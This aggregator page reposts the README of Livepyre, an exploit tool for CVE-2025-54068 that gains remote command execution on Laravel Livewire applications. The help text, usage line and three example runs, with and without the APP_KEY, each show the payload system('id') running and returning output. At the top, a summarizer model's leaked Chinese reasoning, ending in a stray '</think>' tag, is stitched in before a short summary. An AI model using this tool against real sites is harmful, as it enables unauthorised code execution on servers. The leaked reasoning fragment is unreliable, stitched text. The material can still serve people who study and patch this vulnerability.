synacktiv/Livepyre: A tool designed to exploit CVE-2025-54068
好的,用户让我总结一下这篇文章的内容,控制在100字以内,并且不需要特定的开头。我需要先仔细阅读文章,抓住关键点。 文章主要介绍了一个工具Livepyre.py,用于利用CVE-2025-54068漏洞进行远程命令执行。这个工具需要知道Livewire项目的APP_KEY。作者是@_remsio_和@_Worty。工具提供了多种选项,比如指定目标URL、函数、参数、headers、代理、APP_KEY等,并且有帮助选项和调试模式。用户可以通过示例看到如何使用这个工具进行攻击,无论是已知APP_KEY还是未知的情况。最后,项目使用MIT许可证。 现在我要把这些信息浓缩到100字以内,确保涵盖工具名称、用途、作者、功能和许可证信息。 </think> 文章介绍了一个名为Livepyre.py的工具,用于利用CVE-2025-54068漏洞实现远程命令执行,需获取Livewire项目的APP_KEY。该工具支持多种选项,如指定目标URL、函数、参数等,并提供调试和代理功能。 2026-1-8 08:38:39 Author: govuln.com(查看原文) 阅读量:6 收藏

Logo

A tool designed to exploit CVE-2025-54068 and Remote Command Execution if the APP_KEY of the Livewire project is known.

Authors of the tool: @_remsio_ @_Worty.

Help

$ ./Livepyre.py -h
usage: Livepyre.py [-h] -u URL [-f FUNCTION] [-p PARAM] [-H HEADERS] [-P PROXY] [-a APP_KEY] [-d] [-F]
                   [-c]

Livewire exploit tool

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target URL
  -f, --function FUNCTION
                        Function to execute (default: system)
  -p, --param PARAM     Param for function (default: id)
  -H, --headers HEADERS
                        Headers to add to the request (default None)
  -P, --proxy PROXY     Proxy URL for requests
  -a, --app-key APP_KEY
                        APP_KEY to sign snapshot
  -d, --debug           Enable debug output
  -F, --force           Force exploit even if version does not seems to be vulnerable
  -c, --check           Only check if the remote target is vulnerable (only revelant for the exploit
                        without the APP_KEY)

Usage

$ ./Livepyre.py -u https://target.com/

Examples

# Without the APP_KEY and if an object type is in snapshot
$ ./Livepyre.py -u http://livewire.local/counter
[INFO] The remove livewire version is v3.6.2, the target is vulnerable.
[INFO] Found snapshot(s). Running exploit.
[INFO] Running exploit without APP_KEY.
[INFO] Found 1 snapshot(s) available.
[INFO] Found 2 possible param(s).
[INFO] Checking for param(s) with object type to avoid bruteforce.
[INFO] test is typed as an object, triggering RCE.
[INFO] Sending payload system('id') to livewire.
[INFO] Payload works, output:
uid=1337(sail) gid=33(www-data) groups=33(www-data)

# Without the APP_KEY with bruteforce if there isn't any object type in snapshot
$ ./Livepyre.py -u http://livewire.local/counter
[INFO] The remove livewire version is v3.6.2, the target is vulnerable.
[INFO] Found snapshot(s). Running exploit.
[INFO] Running exploit without APP_KEY.
[INFO] Found 1 snapshot(s) available.
[INFO] Found 1 possible param(s).
[INFO] Checking for param(s) with object type to avoid bruteforce.
[WARNING] No param with direct object type was found, attempting bruteforce.
[INFO] Trying to gain RCE with param count.
[INFO] Sending payload system('id') to livewire.
[INFO] Payload works, output:
uid=1337(sail) gid=33(www-data) groups=33(www-data)

# With the APP_KEY
$ ./Livepyre.py -u http://livewire.local/counter -a 'base64:CGhMqYXFMzbOe048WS6a0iG8f6bBcTLVbP36bqqrvuA='
[INFO] The remove livewire version is v3.6.2, the target is vulnerable.
[INFO] Found snapshot(s). Running exploit.
[INFO] Running exploit with APP_KEY.
[INFO] Found 1 snapshot(s) available.
[INFO] Sending payload system('id') to livewire.
[INFO] Payload works, output:
uid=1337(sail) gid=33(www-data) groups=33(www-data)

This project is licensed under the MIT License - see the LICENSE file for details.


文章来源: https://govuln.com/news/url/v8a3
如有侵权请联系:admin#unsafe.sh